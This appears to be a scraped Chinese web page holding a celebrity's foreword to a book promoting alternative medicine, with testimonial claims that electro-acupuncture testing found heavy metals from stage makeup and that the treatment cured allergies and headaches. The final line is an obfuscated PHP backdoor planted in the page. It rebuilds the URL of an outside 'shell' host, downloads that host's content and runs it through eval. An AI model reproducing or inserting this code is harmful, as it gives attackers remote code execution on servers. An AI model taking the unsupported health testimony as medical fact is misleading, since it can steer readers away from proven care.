收藏本站
推薦序 列印 E-mail
文章索引
推薦序
頁 2
頁 3
頁 4
頁 5
頁 6
頁 7
頁 8

一種很棒的預防醫學

孫翠鳳 明華園首席台柱

拿到這本書的讀者是有福氣的,因為你已經接觸了另類醫學的第一步。

我一直覺得,我和劉大元醫師的認識是一種緣份。大 前年七月,一位曾經幫我治療皮膚過敏問題的醫生,在看 到我又因為老問題而回到診所找他的時候,忍不住向我介 紹:「要不要試試看另類醫學治療?」。那時候,我因從 未聽過「另類醫學」這個名詞而一臉困惑;後來經由這位 專業皮膚科醫生的介紹,我認識了劉大元醫師。

劉醫師先為我做電針測試,而後診斷了我的狀況,他 說:「妳皮膚的過敏除了體質問題之外,一方面也是因為 舞台演出化妝太多,沈澱累積了重金屬在體內;再加上主 皮膚的肺和主排毒的腎,功能也不好……。」劉醫師讓我 明瞭,在我們生活中有很多吃的、用的東西都含有毒素, 我們常常吸收了很多毒素並且積存體內而不自知。

診斷之後,我以為劉醫師要開藥方了,沒想到他卻拿出一本書來,書名是「你的醫療選擇權」。他要我拿這 本書回去看看,先了解另類醫學,再來進行醫療。劉大元 醫師獨特的醫療觀念,讓我拿到的第一個藥方是──「讀 書」。讀完劉醫師這本書之後,我深深肯定劉醫師的醫療 方式,不僅是因為他本身的學醫經歷──先學西醫、再學 中醫;更因為他在發現兩者之間還是有盲點之後,又再學 習另類醫學,形成一個整合醫療的用心。

在接受幾次治療之後,我覺得許多原因不明的病症, 例如頭痛、肩頸容易疲憊的毛病都改善了許多;最明顯的 就是皮膚,不僅膚質改變,而且「更健康」了。雖然過敏 體質以及一些不明原因的老毛病已經明顯改善,不過有空 的時候,我還是會去找劉醫師繼續進行另類醫學的治療; 因為我覺得,這是對身體健康很棒的預防醫學,而且可以 多了解自己的身體健康,不但對自己,對家人也很有幫助。劉醫師的「你不可不知的另類健康法」出版,承蒙他 的信任,邀我寫下自己這三年多來接觸另類醫學的見證。 我很開心能夠有機會和大家分享我的心得,也相信這本書 一定能夠造福更多有需要的人。

拿到這本書的讀者是有福 氣的,因為你已經接觸了另類醫學的第一步!


 
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));